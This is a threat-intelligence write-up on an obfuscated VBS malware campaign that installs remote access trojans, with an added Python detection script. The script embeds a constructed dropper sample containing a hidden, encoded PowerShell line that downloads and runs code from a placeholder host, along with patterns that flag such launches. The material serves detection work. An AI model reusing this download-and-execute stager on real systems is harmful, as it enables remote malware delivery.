A sophisticated, multi-stage malware campaign employing heavily obfuscated Visual Basic Script (VBS) files has been discovered across at least 16 open directories.
This campaign, which leverages VBS files such as “sostener.vbs” as its initial attack vector, is notable for its use of advanced obfuscation, dynamic script generation, and the seamless orchestration of additional payloads through PowerShell.
The ultimate objective is to install remote access trojans (RATs) like Remcos, LimeRAT, AsyncRAT, and DCRat onto victim systems while employing a resilient infrastructure for command-and-control (C2) operations.
Technical Execution: Three-Stage Infection Chain
Analysis revealed a well-structured, three-stage malware delivery system:
- Stage 1 (Dropper/Loader):
The VBS file, often exceeding two megabytes and composed primarily of obfuscated junk data, serves as the initial dropper. Upon execution, it decodes a base64-encoded payload embedded within its structure and dynamically generates a PowerShell script in memory.
- Stage 2 (Stager/Downloader):
The in-memory PowerShell script reaches out to remote servers to retrieve further components, including a memory injector and the next-stage RAT payloads. Download locations vary: payloads may be concealed within JPEG images hosted on the Internet Archive or stored as plain text on services such as gofile.io, cdn.tagbox.io, and paste.ee. URLs are often disguised using reversed strings and base64 encoding.
- Stage 3 (Injector/RAT Deployment):
The downloaded injector loads the final RAT directly into memory, evading on-disk detection. Remcos, LimeRAT, AsyncRAT, and DCRat have all been observed in this phase, fetching the binaries from repositories like Bitbucket and paste.ee.
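As an added illustration (not code from the Censys report or from the campaign itself), the heuristics below flag the dropper traits described in Stages 1 and 2: an oversized script, a long base64 blob that decodes to PowerShell, a URL stored as a reversed string literal, and a hidden or encoded PowerShell launch. The VBS sample is constructed for the demonstration, and the names score_vbs, decode_b64_blobs and find_reversed_urls are my own.

```python
import base64
import re
# Constructed sample modelled on the dropper traits described above; not a real dropper.
# The URL uses the reserved .invalid TLD and is stored reversed, as the campaign does.
PS_STAGER = 'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/stage2.txt")'
B64_BLOB = base64.b64encode(PS_STAGER.encode()).decode()
SAMPLE_VBS = "\n".join([
    "' padding comment, stands in for megabytes of junk data",
    "Dim a, b, sh",
    f'a = "{B64_BLOB}"',
    'b = StrReverse("txt.2egats/dilavni.elpmaxe//:sptth")',
    'Set sh = CreateObject("WScript.Shell")',
    'sh.Run "powershell -ep bypass -w hidden -enc " & a, 0, False',
])

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64-alphabet runs
PS_MARKERS = ("iex", "invoke-expression", "downloadstring", "new-object", "frombase64string")
PS_LAUNCH_RE = re.compile(r"powershell[^\n]*(-enc\b|-e\b|-w hidden|-ep bypass)", re.I)
STRING_LIT_RE = re.compile(r'"([^"\n]+)"')                 # VBS double-quoted literals

def decode_b64_blobs(text):
    """Decode long base64 runs and keep those whose plaintext looks like PowerShell."""
    hits = []
    for m in B64_RE.finditer(text):
        try:
            dec = base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error (bad padding/alphabet) is a ValueError
            continue
        if any(k in dec.lower() for k in PS_MARKERS):
            hits.append(dec)
    return hits

def find_reversed_urls(text):
    """Return string literals that become http(s) URLs when read backwards."""
    return [lit[::-1] for lit in STRING_LIT_RE.findall(text)
            if re.match(r"https?://", lit[::-1])]

def score_vbs(text, size_bytes=None):
    """Collect human-readable findings for one script; size_bytes is the on-disk size if known."""
    findings = []
    if size_bytes is not None and size_bytes > 2 * 1024 * 1024:
        findings.append("oversized script (>2 MiB), typical of junk-padded droppers")
    if PS_LAUNCH_RE.search(text):
        findings.append("PowerShell launched with hidden/encoded/bypass flags")
    for dec in decode_b64_blobs(text):
        findings.append("base64 blob decodes to PowerShell: " + dec[:40] + "...")
    for url in find_reversed_urls(text):
        findings.append("reversed URL literal: " + url)
    return findings
```

Run `score_vbs(open(path).read(), os.path.getsize(path))` over a quarantined sample to triage it; the constructed sample above yields three findings.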
Infrastructure and Attribution
According to the Censys report, the malware’s C2 infrastructure relies on domains registered with the “duckdns.org” dynamic DNS service, facilitating rapid IP rotation and resiliency against takedown efforts.
Multiple RATs are configured to communicate with independent and frequently changing C2 servers across a distributed pool of hosts and dynamic ports.
Analysis of Bitbucket repository commit logs linked one threat actor, using the alias “Shadow GRT,” to several payloads. This alias correlates with a broader online presence, suggesting links to Colombian threat group APT-C-36 (Blind Eagle).
The tactics and toolset, especially the use of obfuscated VBS droppers and modular downloaders, are consistent with campaigns previously attributed to this group. However, firm attribution remains speculative due to the open nature of the infrastructure.
The campaign has established a significant network of related domains, TLS certificate fingerprints, payload hashes, and C2 server endpoints.
The infrastructure is notably versatile, employing VPN and port-forwarding services to further obfuscate true server locations.
Indicators of Compromise (IOCs)